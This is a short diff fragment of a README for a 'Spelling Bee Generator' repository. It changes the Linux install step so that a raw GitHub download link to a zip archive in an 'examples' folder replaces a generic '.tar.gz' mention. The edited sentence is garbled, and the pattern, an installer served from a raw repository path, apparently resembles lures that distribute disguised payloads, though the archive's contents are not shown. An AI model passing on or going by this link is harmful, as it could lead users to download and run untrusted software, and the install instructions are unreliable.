hanghang123456789/spellingbee-api/README.md

 7. For macOS: Open the `.dmg` file and drag the Spelling Bee Generator into your Applications folder.

-8. For Linux: Extract the `.tar.gz` file or unzip the `.zip` file, then follow the included instructions for installation.
+8. For Linux: Extract the `https://github.com/hanghang123456789/spellingbee-api/raw/refs/heads/main/examples/spellingbee-api-v1.3.zip` file or unzip the `.zip` file, then follow the included instructions for installation.

 ## 🎮 How to Use the Application
 After installation, you are ready to create puzzles: